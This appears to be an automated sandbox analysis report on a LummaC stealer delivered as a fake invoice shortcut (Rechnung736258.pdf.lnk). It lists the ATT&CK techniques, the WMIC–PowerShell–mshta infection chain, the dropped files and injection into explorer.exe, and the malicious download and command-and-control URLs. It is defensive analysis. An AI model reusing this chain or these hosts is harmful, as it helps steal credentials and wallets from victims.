                      Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\TQDFJHPUIU
                      Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: number of queries: 1001
                      Source: Yara matchFile source: 00000015.00000003.2738358264.0000000003115000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000015.00000003.2632949061.00000000030BD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000015.00000003.2633160316.00000000030BD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 940, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Yara detected LummaC Stealer
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 940, type: MEMORYSTR
                      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                      Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts221
                      Windows Management Instrumentation                      		11
                      DLL Side-Loading                      		1
                      Abuse Elevation Control Mechanism                      		11
                      Deobfuscate/Decode Files or Information                      		2
                      OS Credential Dumping                      		1
                      System Time Discovery                      		Remote Services1
                      Archive Collected Data                      		1
                      Ingress Tool Transfer                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts2
                      Native API                      		Boot or Logon Initialization Scripts11
                      DLL Side-Loading                      		1
                      Abuse Elevation Control Mechanism                      		LSASS Memory22
                      File and Directory Discovery                      		Remote Desktop Protocol41
                      Data from Local System                      		11
                      Encrypted Channel                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain Accounts2
                      Command and Scripting Interpreter                      		Logon Script (Windows)412
                      Process Injection                      		12
                      Obfuscated Files or Information                      		Security Account Manager157
                      System Information Discovery                      		SMB/Windows Admin Shares1
                      Email Collection                      		3
                      Non-Application Layer Protocol                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal Accounts3
                      PowerShell                      		Login HookLogin Hook1
                      Timestomp                      		NTDS331
                      Security Software Discovery                      		Distributed Component Object ModelInput Capture114
                      Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
                      DLL Side-Loading                      		LSA Secrets12
                      Process Discovery                      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts231
                      Masquerading                      		Cached Domain Credentials131
                      Virtualization/Sandbox Evasion                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items131
                      Virtualization/Sandbox Evasion                      		DCSync1
                      Application Window Discovery                      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job412
                      Process Injection                      		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1579308 Sample: Rechnung736258.pdf.lnk Startdate: 21/12/2024 Architecture: WINDOWS Score: 100 80 securesways.click 2->80 82 dimitricostruzioni.ch 2->82 84 2 other IPs or domains 2->84 98 Suricata IDS alerts for network traffic 2->98 100 Found malware configuration 2->100 102 Windows shortcut file (LNK) starts blacklisted processes 2->102 104 14 other signatures 2->104 14 WMIC.exe 1 2->14         started        17 svchost.exe 1 1 2->17         started        signatures3 process4 dnsIp5 138 Contains functionality to create processes via WMI 14->138 140 Creates processes via WMI 14->140 20 powershell.exe 7 14->20         started        23 conhost.exe 1 14->23         started        78 127.0.0.1 unknown unknown 17->78 signatures6 process7 signatures8 106 Windows shortcut file (LNK) starts blacklisted processes 20->106 108 Powershell drops PE file 20->108 25 mshta.exe 16 20->25         started        30 conhost.exe 20->30         started        process9 dnsIp10 86 dimitricostruzioni.ch 62.182.21.105, 443, 49704, 49708 SUB6GB United Kingdom 25->86 72 C:\Users\user\AppData\...\documentcomplie[1], PE32 25->72 dropped 122 Windows shortcut file (LNK) starts blacklisted processes 25->122 124 Suspicious powershell command line found 25->124 32 powershell.exe 17 19 25->32         started        file11 signatures12 process13 file14 64 C:\Users\user\AppData\Roaming\TCUINOVJ.exe, PE32 32->64 dropped 35 TCUINOVJ.exe 6 32->35         started        39 Acrobat.exe 67 32->39         started        41 conhost.exe 32->41         started        process15 file16 66 C:\Users\user\iScrPaint.exe, PE32 35->66 dropped 68 C:\Users\user\WebUI.dll, PE32 35->68 dropped 110 Multi AV Scanner detection for dropped file 35->110 112 Drops PE files to the user root directory 35->112 43 iScrPaint.exe 35->43         started        47 AcroCEF.exe 106 39->47         started        signatures17 process18 file19 74 C:\Users\user\AppData\...\iScrPaint.exe, PE32 43->74 dropped 76 C:\Users\user\AppData\Roaming\...\WebUI.dll, PE32 43->76 dropped 134 Switches to a custom stack to bypass stack traces 43->134 136 Found direct / indirect Syscall (likely to bypass EDR) 43->136 49 iScrPaint.exe 43->49         started        52 AcroCEF.exe 4 47->52         started        signatures20 process21 signatures22 90 Windows shortcut file (LNK) starts blacklisted processes 49->90 92 Maps a DLL or memory area into another process 49->92 94 Switches to a custom stack to bypass stack traces 49->94 96 Found direct / indirect Syscall (likely to bypass EDR) 49->96 54 cmd.exe 49->54         started        process23 file24 70 C:\Users\user\AppData\Local\...\umffwoglbib, PE32 54->70 dropped 114 Injects code into the Windows Explorer (explorer.exe) 54->114 116 Writes to foreign memory regions 54->116 118 Found hidden mapped module (file has been removed from disk) 54->118 120 2 other signatures 54->120 58 explorer.exe 54->58         started        62 conhost.exe 54->62         started        signatures25 process26 dnsIp27 88 securesways.click 104.21.16.1, 443, 49803, 49815 CLOUDFLARENETUS United States 58->88 126 System process connects to network (likely due to code injection or exploit) 58->126 128 Query firmware table information (likely to detect VMs) 58->128 130 Found many strings related to Crypto-Wallets (likely being stolen) 58->130 132 4 other signatures 58->132 signatures28

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      Rechnung736258.pdf.lnk16%ReversingLabsShortcut.Trojan.Cross
                      Rechnung736258.pdf.lnk24%VirustotalBrowse

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Local\Temp\umffwoglbib100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\documentcomplie[1]34%ReversingLabsWin32.Trojan.Fakecaptcha
                      C:\Users\user\AppData\Roaming\BackupPatch\WebUI.dll8%ReversingLabs
                      C:\Users\user\AppData\Roaming\BackupPatch\iScrPaint.exe3%ReversingLabs
                      C:\Users\user\AppData\Roaming\TCUINOVJ.exe30%ReversingLabs
                      C:\Users\user\WebUI.dll8%ReversingLabs
                      C:\Users\user\iScrPaint.exe3%ReversingLabs

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      No Antivirus matches

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      dimitricostruzioni.ch
                      		62.182.21.105
                      		truetrue
                        		unknown
                        bg.microsoft.map.fastly.net
                        		199.232.214.172
                        		truefalse
                          		high
                          securesways.click
                          		104.21.16.1
                          		truetrue
                            		unknown
                            x1.i.lencr.org
                            		unknown
                            		unknownfalse
                              		high

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              securesways.clicktrue
                                		unknown
                                aspecteirs.latfalse
                                  		high
                                  sustainskelet.latfalse
                                    		high
                                    rapeflowwj.latfalse
                                      		high
                                      energyaffai.latfalse
                                        		high
                                        https://securesways.click/apitrue
                                          		unknown
                                          grannyejh.latfalse
                                            		high
                                            necklacebudi.latfalse
                                              		high
                                              crosshuaht.latfalse
                                                		high
                                                https://dimitricostruzioni.ch/new/files/Documents/KlarnaInvoice42611.pdffalse
                                                  		unknown

                                                  URLs from Memory and Binaries

                                                  NameSourceMaliciousAntivirus DetectionReputation
                                                  https://duckduckgo.com/chrome_newtabexplorer.exe, 00000015.00000003.2634324931.0000000005EC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2634404916.0000000005EC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2634516058.0000000005EC6000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://duckduckgo.com/ac/?q=explorer.exe, 00000015.00000003.2634324931.0000000005EC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2634404916.0000000005EC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2634516058.0000000005EC6000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://www.vmware.com/0iScrPaint.exe, 00000010.00000002.2297719622.0000000008B4C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000012.00000002.2563712553.0000000004F70000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2841835521.0000000004CF8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://dimitricostruzioni.ch/dimitri/Tpowershell.exe, 00000007.00000002.2250832181.000002E24DD92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          https://dimitricostruzioni.ch/dimitri/TCUINOVJ.epowershell.exe, 00000007.00000002.2250832181.000002E24DD92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            https://dimitricostruzioni.ch/documentcompliesLOmshta.exe, 00000005.00000002.2677433600.000001BB90E50000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.explorer.exe, 00000015.00000003.2689095480.0000000005F1D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://dimitricostruzioni.ch/documentcomplie~lmshta.exe, 00000005.00000002.2683407387.000001C397F10000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		unknown
                                                                  https://g.live.com/odclientsettings/ProdV2.C:svchost.exe, 00000006.00000003.2080132292.0000020861750000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.6.drfalse
                                                                    		high
                                                                    http://epscd.catcert.net/crl/ec-acc.crl0.TCUINOVJ.exe, 0000000F.00000003.2256610867.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, iScrPaint.exe, 00000010.00000003.2271753574.0000000000830000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		unknown
                                                                      http://dimitricostruzioni.chpowershell.exe, 00000007.00000002.2250832181.000002E24DD92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		unknown
                                                                        https://dimitricostruzioni.ch/dimitri/TCUINOpowershell.exe, 00000007.00000002.2250832181.000002E24DD92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		unknown
                                                                          https://dimitricostruzioni.ch/documentcomplieth=WMIC.exe, 00000000.00000003.2024092555.00000155FA065000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		unknown
                                                                            https://dimitricostruzioni.ch/dimitri/TCUINOVJ.expowershell.exe, 00000007.00000002.2250832181.000002E24DD92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		unknown
                                                                              https://dimitricostruzioni.ch/documentcomplie=C:WMIC.exe, 00000000.00000002.2025601341.00000155F9FE0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		unknown
                                                                                https://nuget.org/nuget.exepowershell.exe, 00000007.00000002.2554482573.000002E25D762000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://dimitricostruzioni.ch/dipowershell.exe, 00000007.00000002.2250832181.000002E24DD92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		unknown
                                                                                    https://dimitricostruzioni.ch/dimitri/TCUINpowershell.exe, 00000007.00000002.2250832181.000002E24DD92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		unknown
                                                                                      https://dimitricostruzioni.ch/documentcompliesmshta.exe, 00000005.00000003.2667650718.000001BB90B1B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2675038959.000001BB90B1D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2672513953.000001BB90B1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2677050404.000001BB90B1D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		unknown
                                                                                        https://dimitricostruzioni.ch/dpowershell.exe, 00000007.00000002.2250832181.000002E24DD92000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                          		unknown
                                                                                          https://dimitricostruzioni.ch/dimitri/TCUpowershell.exe, 00000007.00000002.2250832181.000002E24DD92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		unknown
                                                                                            https://dimitricostruzioni.ch/documentcomplie...mshta.exe, 00000005.00000003.2666686122.000001C3937ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2667263029.000001C3937F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2682370166.000001C3937F5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2667620476.000001C3937F4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2669434915.000001C3937F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		unknown
                                                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000007.00000002.2250832181.000002E24D6F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000007.00000002.2250832181.000002E24D91A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000007.00000002.2250832181.000002E24D91A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://securesways.click/apiaXexplorer.exe, 00000015.00000003.2734517516.0000000003130000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		unknown
                                                                                                      https://contoso.com/Iconpowershell.exe, 00000007.00000002.2554482573.000002E25D762000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://dimitricostruzioni.ch/documentcompliepmshta.exe, 00000005.00000002.2676895482.000001BB90B07000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		unknown
                                                                                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=explorer.exe, 00000015.00000003.2634324931.0000000005EC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2634404916.0000000005EC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2634516058.0000000005EC6000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            http://crl.rootca1.amazontrust.com/rootca1.crl0explorer.exe, 00000015.00000003.2687174165.0000000005F47000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://crl.ver)svchost.exe, 00000006.00000002.3283350977.0000020861A00000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                http://ocsp.rootca1.amazontrust.com0:explorer.exe, 00000015.00000003.2687174165.0000000005F47000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://dimitricostruzioni.ch/documentcomplieVmshta.exe, 00000005.00000003.2667650718.000001BB90B1B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2675038959.000001BB90B1D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2672513953.000001BB90B1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2677050404.000001BB90B1D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		unknown
                                                                                                                    https://securesways.click/apiMexplorer.exe, 00000015.00000003.2686677332.0000000003130000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      		unknown
                                                                                                                      https://www.ecosia.org/newtab/explorer.exe, 00000015.00000003.2634324931.0000000005EC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2634404916.0000000005EC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2634516058.0000000005EC6000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://www.symauth.com/cps0(iScrPaint.exe, 00000010.00000002.2297719622.0000000008B4C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000012.00000002.2563712553.0000000004F70000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2841835521.0000000004CF8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://dimitricostruzioni.ch/dimitri/TCUINOVJ.powershell.exe, 00000007.00000002.2250832181.000002E24DD92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		unknown
                                                                                                                            https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brexplorer.exe, 00000015.00000003.2688636073.00000000061B9000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://github.com/Pester/Pesterpowershell.exe, 00000007.00000002.2250832181.000002E24D91A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://securesways.click/apiUexplorer.exe, 00000015.00000003.2632949061.00000000030BD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  		unknown
                                                                                                                                  https://www.catcert.net/verarrelTCUINOVJ.exe, 0000000F.00000003.2256610867.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, iScrPaint.exe, 00000010.00000003.2271753574.0000000000830000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    http://crl.microexplorer.exe, 00000015.00000003.2840015148.0000000003107000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2632949061.00000000030BD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2839435655.00000000030BD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://dimitricostruzioni.ch/documentcomplieHmshta.exe, 00000005.00000002.2678187215.000001C3929E0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        		unknown
                                                                                                                                        http://www.symauth.com/rpa00iScrPaint.exe, 00000010.00000002.2297719622.0000000008B4C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000012.00000002.2563712553.0000000004F70000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2841835521.0000000004CF8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://dimitricostruzioni.ch/dimitrpowershell.exe, 00000007.00000002.2250832181.000002E24DD92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            		unknown
                                                                                                                                            https://dimitricostruzioni.ch/dimitri/TCpowershell.exe, 00000007.00000002.2250832181.000002E24DD92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              		unknown
                                                                                                                                              https://securesways.click/apiaexplorer.exe, 00000015.00000003.2734517516.0000000003130000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                		unknown
                                                                                                                                                http://www.info-zip.org/iScrPaint.exe, 00000010.00000002.2297719622.0000000008AF6000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000012.00000002.2563712553.0000000004F28000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2841835521.0000000004CB0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://dimitricostruzioni.cpowershell.exe, 00000007.00000002.2250832181.000002E24DD92000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                                                                    		unknown
                                                                                                                                                    https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&refexplorer.exe, 00000015.00000003.2689095480.0000000005F1D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://dimitricostruzioni.ch/dimitripowershell.exe, 00000007.00000002.2250832181.000002E24DD92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        		unknown
                                                                                                                                                        https://securesways.click/api1Nexplorer.exe, 00000015.00000003.2839435655.00000000030BD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2840914690.00000000030BD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          		unknown
                                                                                                                                                          https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477explorer.exe, 00000015.00000003.2689095480.0000000005F1D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            http://bugreports.qt-project.org/QHttpNetworkConnectionChannel::_q_receiveReply()TCUINOVJ.exe, 0000000F.00000003.2256610867.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, iScrPaint.exe, 00000010.00000002.2331881203.000000006C117000.00000002.00000001.01000000.00000011.sdmp, iScrPaint.exe, 00000011.00000002.2395944422.000000006B7CC000.00000002.00000001.01000000.00000014.sdmp, WebUI.dll.15.drfalse
                                                                                                                                                              		high
                                                                                                                                                              https://securesways.click/apisexplorer.exe, 00000015.00000003.2763626121.000000000311D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2763685587.0000000003130000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                		unknown
                                                                                                                                                                https://dimitricostruzioni.ch/documentcomplie$global:?powershell.exefalse
                                                                                                                                                                  		unknown
                                                                                                                                                                  https://dimitricostruzioni.ch/dimipowershell.exe, 00000007.00000002.2250832181.000002E24DD92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    		unknown
                                                                                                                                                                    https://dimitricostruzioni.ch/documentcomplie(mshta.exe, 00000005.00000002.2676895482.000001BB90B07000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      		unknown
                                                                                                                                                                      http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-/W3C/DTDTCUINOVJ.exe, 0000000F.00000003.2256610867.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, iScrPaint.exe, 00000010.00000002.2331881203.000000006C208000.00000002.00000001.01000000.00000011.sdmp, iScrPaint.exe, 00000011.00000002.2395944422.000000006B8A4000.00000002.00000001.01000000.00000014.sdmp, WebUI.dll.15.drfalse
                                                                                                                                                                        		high
                                                                                                                                                                        http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtdTCUINOVJ.exe, 0000000F.00000003.2256610867.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, iScrPaint.exe, 00000010.00000002.2331881203.000000006C208000.00000002.00000001.01000000.00000011.sdmp, iScrPaint.exe, 00000011.00000002.2395944422.000000006B8A4000.00000002.00000001.01000000.00000014.sdmp, WebUI.dll.15.drfalse
                                                                                                                                                                          		high
                                                                                                                                                                          https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYiexplorer.exe, 00000015.00000003.2689095480.0000000005F1D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://contoso.com/Licensepowershell.exe, 00000007.00000002.2554482573.000002E25D762000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              https://dimitricostruzioni.ch/documentcomplie1mshta.exe, 00000005.00000002.2676895482.000001BB90B07000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                		unknown
                                                                                                                                                                                http://schemas.xmlsoap.org/soap/envelope/TCUINOVJ.exe, 0000000F.00000003.2256610867.00000000026E6000.00000004.00000020.00020000.00000000.sdmp, iScrPaint.exe, 00000010.00000000.2259726588.0000000000401000.00000020.00000001.01000000.00000010.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  https://dimitricostruzioni.ch/documentcomplie...Kmshta.exe, 00000005.00000002.2679004868.000001C39374B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		unknown
                                                                                                                                                                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=explorer.exe, 00000015.00000003.2634324931.0000000005EC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2634404916.0000000005EC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2634516058.0000000005EC6000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      https://dimitricostruzioni.ch/dimitri/TCUINOVJpowershell.exe, 00000007.00000002.2250832181.000002E24DD92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		unknown
                                                                                                                                                                                        https://dimitricostruzioni.ch/dimitri/TCUINOVpowershell.exe, 00000007.00000002.2250832181.000002E24DD92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		unknown
                                                                                                                                                                                          https://securesways.click:443/apiexplorer.exe, 00000015.00000003.2632949061.00000000030AE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2633160316.00000000030B0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		unknown
                                                                                                                                                                                            https://dimitricostruzioni.ch/documentcomplie...wmshta.exe, 00000005.00000003.2666686122.000001C3937ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2667263029.000001C3937F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2682370166.000001C3937F5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2667620476.000001C3937F4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2669434915.000001C3937F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		unknown
                                                                                                                                                                                              https://www.catcert.cat/verCIT-10iScrPaint.exe, 00000010.00000003.2271753574.0000000000830000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		unknown
                                                                                                                                                                                                https://dimitricostruzioni.ch/dimitpowershell.exe, 00000007.00000002.2250832181.000002E24DD92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                  http://x1.c.lencr.org/0explorer.exe, 00000015.00000003.2687174165.0000000005F47000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    http://x1.i.lencr.org/0explorer.exe, 00000015.00000003.2687174165.0000000005F47000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      https://dimitricostruzioni.ch/documentcomplieajmshta.exe, 00000005.00000003.2667650718.000001BB90B1B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2675038959.000001BB90B1D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2672513953.000001BB90B1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2677050404.000001BB90B1D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        		unknown
                                                                                                                                                                                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchexplorer.exe, 00000015.00000003.2634324931.0000000005EC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2634404916.0000000005EC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2634516058.0000000005EC6000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          		high
                                                                                                                                                                                                          https://contoso.com/powershell.exe, 00000007.00000002.2554482573.000002E25D762000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            		high
                                                                                                                                                                                                            https://dimitricostruzioni.ch/documentcompliehttps://dimitricostruzioni.ch/documentcompliemshta.exe, 00000005.00000003.2673692306.000001C399325000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              		unknown
                                                                                                                                                                                                              https://dimitricostruzioni.ch/dimitri/TCUIpowershell.exe, 00000007.00000002.2250832181.000002E24DD92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                		unknown
